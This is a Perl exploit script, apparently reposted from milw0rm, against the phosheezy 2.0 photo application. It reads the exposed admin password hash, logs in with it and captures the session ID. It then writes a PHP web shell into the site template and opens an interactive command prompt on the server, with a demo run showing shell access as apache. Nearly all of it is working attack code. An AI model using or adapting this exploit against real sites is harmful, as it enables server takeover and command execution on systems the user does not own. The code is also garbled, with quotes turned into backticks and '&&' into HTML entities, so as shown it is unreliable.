phosheezy 2.0 Remote Command Execution Exploit#!/usr/bin/perl

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

my $host       =  $ARGV[0];
my $pwd_path   =  `/config/password`;
my $adm_path   =  `/admin.php`;
my $templ_path =  `/admin.php?action=3`;

help(`-1`) unless ($host);
cheek($host) == 1 || help(`-2`);
&banner;

$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

my $url = $host.$pwd_path;
my $re = get_req($url);

if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;
    print `[+] Admin password found:\n`;
    print `    Sha1 pwd: $password  \n`;
    adm_log($password);
}
else {
    print `[-] Unable to get sha1 Admin password\n\n`;
    exit(0);
}

sub adm_log() {
    my $password =  $_[0];
    my $link     =  $path.`.`.$adm_path;
    my $post     =  `password=$password&Login=Login`;
    my $length   =  length($post);
    my @data;
    my $socket   =  new IO::Socket::INET(
                                          PeerAddr => $h0st,
                                          PeerPort => '80',
                                          Proto    => 'tcp',
                                        ) or die $!;

    my $data = `POST `.$link.` HTTP/1.1\r\n`.
               `Host: `.$h0st.`\r\n`.
               `Content-Type: application/x-www-form-urlencoded\r\n`.
               `Content-Length: `.$length.`\r\n\r\n`.
               $post.`\r\n`;

    $socket->send($data);
    print `[+] Grabbing server headers to get a valid SESSION ID ..\n`;

    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;
            print `[+] Succesfully logged in as Administrator\n`;
        }
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;
            print `[+] SESSION ID grabbed: $phpsessid\n`;
        }
    }

    (($log_)&amp;&amp;($phpsessid)) || die `[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n`;
    RCE_create($phpsessid);
}

sub RCE_create() {
    my $phpsessid = $_[0];
    my $link     =  $path.`.`.$templ_path;
    my $code = `header=Ryneezy PhoSheezy</tit`.
               `le><body bgcolor=\`#ffffff\` text=\`#0000`.
               `00\`>&amp;footer=</body><!-- cmd --><?php sys`.
               `tem(\$_GET[cmd]);?><!--cmd-->&amp;Submit=Edit Layout`;
    my $length =  length($code);

    my $socket = new IO::Socket::INET(
                                       PeerAddr => $h0st,
                                       PeerPort => '80',
                                       Proto    => 'tcp',
                                     ) or die $!;

    my $data = `POST `.$link.` HTTP/1.1\r\n`.
               `Host: `.$h0st.`\r\n`.
               `Cookie: PHPSESSID=`.$phpsessid.`; hotlog=1\r\n`.
               `Content-Type: application/x-www-form-urlencoded\r\n`.
               `Content-Length: `.$length.`\r\n\r\n`.
               `$code\r\n`;

    $socket->send($data);

    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print `[+] Template edited, RCE Vulnerability Created !\n`;
        }
    }

    $rce_c == 1 || die `[-] Can't edit Template. Exploit failed\n\n`;
    &amp;exec_cmd;
}

sub exec_cmd {
    print `shell\$> `;
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die `[-] Quitting ..\n`;
    $exec_url = ($host.`/index.php?cmd=`.$cmd);
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {
        my $cmd = $1;
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
        print `$cmd\n`;
        &amp;exec_cmd;
    }
    else {
        print `[-] Undefined output or bad cmd !\n`;
        &amp;exec_cmd;
    }
}

sub get_req() {
    $link   = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_data() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www\.//;
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st.` `.$path;
    return $full_det;
}

sub banner {
    print `\n`.
          `  ---------------------------- \n`.
          `     Phosheezy RCE Exploit     \n`.
          `        Coded by Osirys        \n`.
          `  ---------------------------- \n\n`;
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &amp;banner;
        print `\n[-] Cheek that you provide a hostname address!\n`;
    }
    elsif ($error == -2) {
        &amp;banner;
        print `\n[-] Bad hostname address !\n`;
    }
    print `[*] Usage : perl $0 http://hostname/cms_path\n\n`;
    exit(0);
}

# milw0rm.com [2009-01-14]